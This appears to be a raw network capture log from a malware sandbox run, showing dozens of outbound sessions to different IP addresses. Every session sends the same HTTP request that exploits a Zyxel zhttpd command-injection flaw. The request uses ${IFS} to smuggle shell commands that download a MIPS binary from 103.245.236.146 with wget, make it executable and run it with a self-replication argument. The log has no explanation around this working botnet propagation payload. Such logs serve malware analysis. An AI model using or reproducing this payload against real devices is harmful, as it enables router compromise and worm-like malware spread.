                                                Jan 28, 2024 10:16:35.972157001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7073192.168.2.234654438.186.116.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972197056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7074192.168.2.2339014193.78.184.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972201109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7075192.168.2.2342054222.123.84.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972201109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7076192.168.2.234246845.143.225.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972263098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7077192.168.2.235154617.198.133.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972274065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7078192.168.2.2356912183.170.116.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972306967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7079192.168.2.2347270113.84.53.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972321987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7080192.168.2.2335034122.88.173.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972337961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7081192.168.2.2342518193.161.175.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972562075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7082192.168.2.2341474207.229.49.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972584963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7083192.168.2.23414189.41.37.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972634077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7084192.168.2.2345294116.235.78.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972634077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7085192.168.2.233314282.21.13.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972659111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7086192.168.2.234140491.141.123.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972698927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7087192.168.2.2338808218.163.126.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972721100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7088192.168.2.2332986133.219.196.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972735882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7089192.168.2.2344630202.191.121.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972763062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7090192.168.2.2359084196.116.127.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972799063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7091192.168.2.234031638.154.128.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972819090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7092192.168.2.2359030217.250.194.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972856998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7093192.168.2.2352894116.22.227.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972884893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7094192.168.2.234161038.116.163.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972915888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7095192.168.2.2357024122.38.152.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972943068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7096192.168.2.2356532180.205.211.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972964048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7097192.168.2.2336026136.171.82.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973011971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7098192.168.2.234042251.125.7.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973040104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7099192.168.2.2352168132.68.238.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973047018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7100192.168.2.2345150134.46.62.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973057032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7101192.168.2.23409169.249.238.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973107100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7102192.168.2.2332836119.55.53.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973125935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7103192.168.2.233477281.121.61.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973145008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7104192.168.2.2344504115.68.98.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973169088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7105192.168.2.234528881.245.51.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973193884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7106192.168.2.2348230221.219.62.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973228931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7107192.168.2.2343962202.236.60.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973272085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7108192.168.2.234034495.73.25.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973304033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7109192.168.2.2339520212.188.231.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973334074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7110192.168.2.2349196163.114.162.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973361969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7111192.168.2.234268642.93.17.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973397970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7112192.168.2.2343694194.153.192.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973433971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7113192.168.2.2348660154.184.128.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973454952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7114192.168.2.2339906197.238.10.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973473072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7115192.168.2.2349746171.127.166.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973532915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7116192.168.2.2340242116.208.86.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973551989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7117192.168.2.2353926191.211.232.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973566055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7118192.168.2.2343160176.120.225.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973601103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7119192.168.2.2340142121.254.173.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973630905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7120192.168.2.234630645.97.141.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973654985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7121192.168.2.2359038194.84.245.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973670006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7122192.168.2.235496446.72.66.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973720074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7123192.168.2.234528014.218.234.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973746061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7124192.168.2.234354296.89.151.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973776102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7125192.168.2.2354448152.177.13.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973783970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7126192.168.2.235047861.249.180.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973838091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7127192.168.2.2336132146.186.36.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973853111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7128192.168.2.23448941.214.253.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973885059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7129192.168.2.234241267.231.144.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973896980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7130192.168.2.233312475.89.39.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973938942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7131192.168.2.2333990176.74.194.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.973995924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7132192.168.2.233796619.18.16.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974020958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7133192.168.2.2346558173.95.131.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.974050999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7134192.168.2.2352406110.104.46.112443
                                                TimestampBytes transferredDirectionData
